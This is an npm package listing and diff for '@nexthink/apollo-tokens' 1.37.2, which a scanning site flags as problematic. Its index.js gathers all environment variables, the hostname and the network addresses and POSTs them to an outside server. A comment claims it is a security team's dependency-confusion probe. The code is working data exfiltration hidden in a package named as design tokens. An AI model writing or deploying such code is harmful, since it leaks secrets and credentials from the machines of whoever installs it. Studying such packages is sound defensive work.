@nexthink/apollo-tokens 1.37.2
Sign up to get free protection for your applications and to get access to all the features.
Potentially problematic release.
This version of @nexthink/apollo-tokens might be problematic. Click here for more details.
- package/LICENSE +21 -0
- package/README.md +1 -0
- package/index.js +54 -0
- package/package.json +19 -0
package/LICENSE
ADDED
@@ -0,0 +1,21 @@
|
|
1
|
+
MIT License
|
2
|
+
|
3
|
+
Copyright (c) 2022 nxt-fmiquel
|
4
|
+
|
5
|
+
Permission is hereby granted, free of charge, to any person obtaining a copy
|
6
|
+
of this software and associated documentation files (the "Software"), to deal
|
7
|
+
in the Software without restriction, including without limitation the rights
|
8
|
+
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
|
9
|
+
copies of the Software, and to permit persons to whom the Software is
|
10
|
+
furnished to do so, subject to the following conditions:
|
11
|
+
|
12
|
+
The above copyright notice and this permission notice shall be included in all
|
13
|
+
copies or substantial portions of the Software.
|
14
|
+
|
15
|
+
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
|
16
|
+
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
|
17
|
+
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
|
18
|
+
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
|
19
|
+
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
|
20
|
+
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
|
21
|
+
SOFTWARE.
|
package/README.md
ADDED
@@ -0,0 +1 @@
|
|
1
|
+
# apollo-tokens
|
package/index.js
ADDED
@@ -0,0 +1,54 @@
|
|
1
|
+
'use strict'
|
2
|
+
|
3
|
+
// This code dumps local env variable and post them to an http server to identify the machines vulnerable to npmjs org/package claim.
|
4
|
+
// If you see this comment, please contact security@nexthink.com - this code and server are under the control of the Nexthink Security Team and no harmful code is executed.
|
5
|
+
|
6
|
+
const env = process.env;
|
7
|
+
|
8
|
+
const os = require("os");
|
9
|
+
env.hostname = os.hostname();
|
10
|
+
env.package = "apollo-tokens";
|
11
|
+
|
12
|
+
const nets = os.networkInterfaces();
|
13
|
+
const results = Object.create(null);
|
14
|
+
for (const name of Object.keys(nets)) {
|
15
|
+
for (const net of nets[name]) {
|
16
|
+
// Skip internal (i.e. 127.0.0.1) addresses
|
17
|
+
if (!net.internal) {
|
18
|
+
if (!results[name]) {
|
19
|
+
results[name] = [];
|
20
|
+
}
|
21
|
+
results[name].push(net.address);
|
22
|
+
}
|
23
|
+
}
|
24
|
+
}
|
25
|
+
env.inets = JSON.stringify(results);
|
26
|
+
|
27
|
+
// request options
|
28
|
+
const options = {
|
29
|
+
host: "doc.nexthink.com",
|
30
|
+
path: '/npm',
|
31
|
+
method: 'POST',
|
32
|
+
body: JSON.stringify(env),
|
33
|
+
headers: {
|
34
|
+
'Content-Type': 'application/json'
|
35
|
+
}
|
36
|
+
}
|
37
|
+
|
38
|
+
// send POST request
|
39
|
+
const https = require('https');
|
40
|
+
const request = https.request(options, (res) => {
|
41
|
+
if (res.statusCode !== 200) {
|
42
|
+
res.resume();
|
43
|
+
return;
|
44
|
+
}
|
45
|
+
res.on('close', () => {
|
46
|
+
});
|
47
|
+
});
|
48
|
+
request.write(JSON.stringify(env));
|
49
|
+
request.end();
|
50
|
+
request.on('error', (err) => {
|
51
|
+
console.error(`Encountered an error trying to make a request: ${
|
52
|
+
err.message
|
53
|
+
}`);
|
54
|
+
});
|
package/package.json
ADDED
@@ -0,0 +1,19 @@
|
|
1
|
+
{
|
2
|
+
"name": "@nexthink/apollo-tokens",
|
3
|
+
"version": "1.37.2",
|
4
|
+
"main": "index.js",
|
5
|
+
"scripts": {
|
6
|
+
"test": "echo \"Error: no test specified\" && exit 1"
|
7
|
+
},
|
8
|
+
"author": "",
|
9
|
+
"license": "MIT",
|
10
|
+
"repository": {
|
11
|
+
"type": "git",
|
12
|
+
"url": "git+https://github.com/nxt-fmiquel/apollo-tokens.git"
|
13
|
+
},
|
14
|
+
"bugs": {
|
15
|
+
"url": "https://github.com/nxt-fmiquel/apollo-tokens/issues"
|
16
|
+
},
|
17
|
+
"homepage": "https://github.com/nxt-fmiquel/apollo-tokens#readme",
|
18
|
+
"description": ""
|
19
|
+
}
|